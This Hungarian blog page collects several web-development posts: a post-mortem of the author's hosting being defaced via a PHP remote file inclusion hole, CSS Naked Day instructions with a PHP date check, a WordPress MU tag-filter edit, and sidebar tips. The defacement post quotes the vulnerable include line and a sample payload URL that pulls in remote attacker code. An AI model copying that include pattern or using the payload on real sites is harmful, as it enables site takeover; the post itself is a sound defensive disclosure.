kobak pont org

Nos, Ramil Safarov egy érdekes ember. Azonkívül, hogy sokan láthattátok hasonlatosságát Csányi Sándor ünnepelt szinészünknel, egy örmény társának életét vette egy baltával. Ennek ellenére, vagy éppen ezért Azerbajdzsánban az Év Embere lett.

Weboldala három nyelven köszönti az olvasókat, köztük magyarul is. Ennek oka gondolom az, hogy tudomásom szerint még mindig nálunk van fogva tartva. Naprakész információval nem rendelkezem, pedig igyekeztem utánajárni a dolognak.

A dolgot szőnyeg alá seperhettük volna, s hallgathatnék a hibáinkról, de úgy érzem jobb ide leírni, hogy mi is, s Ti is tanulhassatok belőle.

És most akkor a technikai bla-bla. A deface-t három dolog együttállásának köszönhettük. Egy nem éppen biztonságos php include parancsot az egyik domainen, illetve két kényelmi szolgáltatást kihasználva sikerült elérni, hogy önakaratunkon kívül sikerült betársulnunk Ramil szabadításáért küzdők népes táborába.

"include_once($_GET[oldal]."_".$_SESSION[lang].".php");" kód tanult kollégám szerint kiváló lehetőséget nyújt a rosszindulatú emberünknek, hogy a index.php?oldal=http://oldalam.com/gonosz-kodom.php?semmi= szöveg címsorba írása után http://oldalam.com/gonosz-kodom.php?semmi=_hu.php -t inklúdolja (mi erre a szép magyar szó), s lefuttassa. (a domain, illetve a kód tulajdonosát értesítettük, hogy javítsa ki, távolítsa azt el az oldalról.)

Ezzel emberünk a webszerver jogaival tudott fájlokat létrehozni. S valóban tudott is, mert kényelmi okokból sok domainen biztosítottuk az írásjogot. És, hogy a dolog még szebb legyen egy nemrég felkerült domain kedvéért létezett egy aldomain, amivel a teljes wwwroot bejárható volt. (megszüntettük az írásjogot, mindenkinek magának kell ezután engedélyezni, ha szeretné, hogy fel tudjon tölteni, stb. Az aldomaint szintén megszüntettük)

Tanulság: Kiskaput nem nyitunk, vagy ha igen, azonnal bezárjuk. A dolog előnye viszont, hogy íly módon minden cms a legfrissebbre lett upgrade-elve, ezzel csökkentve egy következő akció sikerességét. Frissült a teljes rendszer, minden, ami lehetett.

És akkor a végére az állandó kérdés, hogy mi a helyes arány a biztonság és a használhatóság között?

Április 9-én, azaz holnap újra CSS naked day lesz. Infók a 2006-os, első és a tavalyi 2007-es alkalomról. Idén a szervezők még több résztvevővel számolnak.

Hova tűnt a design?

Április 9-én mindenki megmutatja hogyan néz ki az oldala valójában. Ezzel is szemléltetve az xhtml+css erejét.

Hogyan vehetek részt ebben?

Jelentkezz a CSS Naked day oldalon, s bekerül az oldalad linkje is a résztvevők közé. Ezután semmi más dolgod nincs, mint minden CSS-t eltávolítani az oldaladról.

Opcionálisan a rémült olvasóidnak leírhatod, hogy nem az Ő böngészőjükkel van baj, hanem ez a mai egy ilyen nap:

[source:html]

Hova lett a design?

Ha meg akarod tudni mi történt, látogass el aAnnual CSS Naked Day weboldalra további információért!

[/source]

Mikor lesz ilyen legközelebb?

Jövőre. Az időpont választásban több dolgot is figyelembe kell venni, ezért lett idén április 9-e a css naked day:

• A Naked Day kedd, szerda, vagy csütörtök kell, hogy legyen (ezek a legforgalmasabb napok)
• Közel kell essen április első hetéhez
• Nem lehet április elseje (bolondok napja)
• Legalább 5 nappal előbb meg kell hirdetni, mint esedékes

Ne gondolkozz, csak csináld!

Alábbi php kód megkönnyíti a naked dayre való felkészülést:

[source:php]function is_naked_day($d) {
$start = date('U', mktime(-12, 0, 0, 04, $d, date('Y')));
$end = date('U', mktime(36, 0, 0, 04, $d, date('Y')));
$z = date('Z') * -1;
$now = time() + $z;
if ( $now >= $start && $now <= $end ) {
return true;
}
return false;
}
?>[/source]

Egy példa a használatra:

[source:php]…if ( is_naked_day(9) ) {
echo '';
} else {
echo '';
}
?>…[/source]

Ha wordpresst használsz, akkor ajánlom Aja pluginjét, de rengeteg más platformhoz is találsz segítséget a CSS naked day oldalon.

Ha wordpress mu-t ha használ valaki, akkor észrevehette, hogy egy csomó tag opcionális attribútumait kiszűri a posztokból a mu. Ez zavaró tud lenni jó esetben, rosszabb esetben lehetetlenné teszi az életünket. A mu készítői ezt azzal magyarázzák, hogy így biztonságosabb lesz az oldalunk. Igazuk van, bár nem tudom, mekkora biztonsági rés az a tag esetében a class, vagy a target használata.

Ha felül szeretnénk bírálni a mu fejlesztő döntését, akkor keressük meg a wp-includes/kses.php fájlt, s nézzünk bele:

[source:php]$allowedposttags = array (‘address’ => array (), ‘a’ => array (‘href’ => array (), ‘title’ => array (), ‘rel’ => array (), ‘rev’ => array (), ‘name’ => array (), ‘class’ => array (), ‘target’ => array ())[/source]

Látható, hogy az a után a href, title, rel, rev, name, class, meg a target engedélyezettek. Ha bármi mást engedélyezni szeretnénk, akkor a 'mas' => array() formában kell beszúrni a fájlba.

Sajnos a blogot internet explorerben nézve a jobb oldali side bar sokszor lecsúszik az oldal aljára. Emiatt átmenetileg az ie felhasználókat egy figyelmeztetés fogadja a header alatt:

Az ötlet akkor fogant, miután HiA figyelmeztetett, hogy ie-ben hibásan jelenik meg az oldal, s utána megnéztem én is, s néha valóban így van. A probléma okát még keresem. Ekkor valamiért átszörföltem angelday blogjára, ahol megláttam, hogy ő figyelmeztet mindenkit az explorer használat buktatóira. Ekkor döntöttem el, hogy egy ilyen figyelmeztetést én is beteszek magamnak, amíg a probléma nincs orvosolva.

S ha már összepakoltam a dolgot, gondoltam megosztom mindenkivel, hogy csináltam. k2 esetén a theloop.php elejére biggyesztettem be a következő kis kódot:

[syntax,ie_alert.txt,php]

Egyéb témánál is működnie kell a fenti kódnak, azonban a formázást abban az esetben még külön meg kell csinálni.

Dávid kérdésére úgy döntöttem nem csak ott válaszolok, hanem közzéteszem a dolgot mindenki számára.

A kérdés az, hogy lehet több hasábot tenni a sidebarra. Szerintem a legegyszerűbb módszer erre a következő:
Csinálsz css-ben egy div-et, aztán két másikat azon belül megadott szélességgel. Ezután a sidebar.php -ba beteszed a diveket, s működik az egész.

példa (css):
[syntax,ketoszlop.css,css]

(Értelemszerűen cseréld a szélességeket arra, amire akarod!)

példa (php file-ba illesztendő):

[syntax,ketoszlop.txt,php]

U.I.: php/css guruk javítsatok, ha valahol elrontottam!